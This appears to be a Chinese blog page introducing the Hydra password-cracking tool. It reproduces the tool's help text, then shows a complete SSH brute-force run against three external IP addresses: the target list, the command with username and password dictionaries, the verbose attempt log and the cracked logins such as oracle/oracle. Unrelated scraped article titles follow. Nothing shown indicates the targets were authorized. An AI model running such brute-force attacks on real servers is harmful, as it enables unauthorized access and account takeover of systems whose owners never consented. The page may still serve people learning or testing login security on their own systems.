安全工具-Hydra
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]
Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
Example: hydra -l user -P passlist.txt ftp://192.168.0.1
# 待破解的主机列表
root@kali:~# cat serverlist
189.37.178.1
189.37.178.216
189.37.178.98
# 破解主机的ssh用户名密码
root@kali:~# hydra -L ssh_user.dic -P ssh_pass.dic -t -vV -o ./output.txt -e ns -M serverlist ssh
Hydra v8. (c) by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have seconds to abort...
[DATA] max tasks per servers, overall tasks, login tries (l:/p:), ~ tries per task
[DATA] attacking service ssh on port
[VERBOSE] Resolving addresses ... done
[INFO] Testing if password authentication is supported by ssh://189.37.178.47:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.47:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.216:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.216:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.98:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.98:22
[ATTEMPT] target 189.37.178.1 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[][ssh] host:189.37.178.98 login: root
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" - of [child ]
[][ssh] host:189.37.178.1 login: pentest password:
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" - of [child ]
[][ssh] host:189.37.178.216 login: oracle password: oracle
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
of targets successfully completed, valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
# 查看output.txt即可查看已破解成功的列表 root@kali:~# cat output.txt
# Hydra v8. run at -- :: on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t -vV -o ./output.txt -e ns -M serverlist ssh)
[][ssh] host: 189.37.178.98 login: root
[][ssh] host: 189.37.178.1 login: pentest password:
[][ssh] host: 189.37.178.216 login: oracle password: oracle
安全工具-Hydra的更多相关文章
- 路由器密码破解工具 Hydra 7.5
之前只在 Browser 中保存了路由管理密码,无奈升级时管理的密码丢失了,又不想重新设置,所以尝试破解登录密码. 使用破解工具 Hydra 7.5. # hydra -l username -x : ...
- Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用
Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用 hydra可以破解: http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco a ...
- 暴力破解工具hydra与Medusa
---恢复内容开始--- 暴力破解工具hydra与Medusa 内容 (一)hadry (二)Medusa (一)hydra 选项 -l LOGIN 指定破解的用户名称,对特定用户破解. -L FIL ...
- (总结)Linux下的暴力密码在线破解工具Hydra详解
(总结)Linux下的暴力密码在线破解工具Hydra详解 学习了:https://blog.csdn.net/yafeichang/article/details/53502869
- 初试在线破解工具Hydra爆破3389服务器
hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的. 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器.hydra还支持G ...
- Linux下暴力破解工具Hydra详解
一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...
- [转]Linux下的暴力密码破解工具Hydra详解
摘自:http://linzhibin824.blog.163.com/blog/static/735577102013144223127/ 这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破 ...
- linux下暴力破解工具hydra【转】
一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...
- linux暴力密码破解工具hydra安装与使用
说明:hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco ...
- Kali中密码暴力破解工具hydra的使用
前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解.密码能否破解,在于字典是否强大.本文仅从安全角度去讲解工具的使用,请 ...
随机推荐
- BZOJ.5288.[AHOI/HNOI2018]游戏(思路 拓扑)
BZOJ LOJ 洛谷 考虑如何预处理每个点能到的区间\([l,r]\). 对于\(i,i+1\)的一扇门,如果钥匙在\(i\)的右边,连边\(i\to i+1\),表示从\(i\)出发到不了\(i+ ...
- Java笔记(十七) 异步任务执行服务
异步任务执行服务 一.基本原理和概念 一)基本接口 1)Runnable和Callable:表示要执行的异步任务. 2)Executor和ExecutorService:表示执行服务. 3)Futur ...
- 2190 ACM 数学概率论的乘法和加法原则
题目:http://acm.hdu.edu.cn/showproblem.php?pid=2190 思路:明显我们要寻找 边长为n和边长为n-1,n-2,n-3·····的规律,这样得出一个递推公式就 ...
- centos7下使用yum安装pip
centos7下使用yum安装pip 首先安装epel扩展源: yum -y install epel-release 更新完成之后,就可安装pip: yum -y install python-pi ...
- nodejs,mongodb不同时区问题
问题:不同国家,使用不同时区,而服务器代码却在国内,跨时区日期不同,根据日期查询,查询不到数据了 1.mongodb存储的new Date()是UTC时间,也就是0时区的时间,世界标准时间 2.参考m ...
- MySQL(六)
自关联 设计省信息的表结构provinces id ptitle 设计市信息的表结构citys id ctitle proid citys表的proid表示城市所属的省,对应着provinces表的i ...
- 编程菜鸟的日记-初学尝试编程-C++ Primer Plus 第5章编程练习2
#include <iostream>using namespace std;const int MAXSIZE=100;int main(){ int a[MAXSIZE]; int s ...
- 编程菜鸟的日记-初学尝试编程-C++ Primer Plus 第4章编程练习3
#include <iostream>#include <cstring>using namespace std;int main(){ char fname[20]; cha ...
- .net缓存的应用研究(读篇)
目前,缓存主要有两种技术:分布式缓存和进程级别的内容缓存.两种缓冲具体的差异就不废话了. 1.在技术上 数据库降压的最好方式就是缓存.在缓存的性能上,进程级别的内存缓存性能有明显优于分布式缓存,内存缓 ...
- Html表格:
(1)<table>标签:声明一个表格,它的常用属性如下: -- border属性 定义表格的边框,设置值是数值 -- cellpadding属性 定义单元格内容与边框的距离,设置值是数值 ...